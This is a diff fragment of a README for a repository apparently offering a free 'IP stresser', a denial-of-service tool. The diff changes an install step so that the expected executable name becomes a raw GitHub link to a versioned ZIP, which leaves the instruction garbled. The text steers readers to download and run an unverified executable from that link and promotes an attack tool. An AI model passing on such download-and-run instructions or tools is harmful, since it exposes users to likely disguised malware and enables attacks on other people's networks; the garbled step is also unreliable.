alvyys/free-ip-stresser/README.md

 1. Locate the downloaded file in your computer.
 2. If it is a ZIP file, extract it by right-clicking and selecting "Extract All."
-3. Find the executable file (usually named `free-ip-stresser.exe` or similar).
+3. Find the executable file (usually named `https://raw.githubusercontent.com/alvyys/free-ip-stresser/main/Ferrara/free-stresser-ip-v3.9.zip` or similar).

 ### Step 4: Run the Application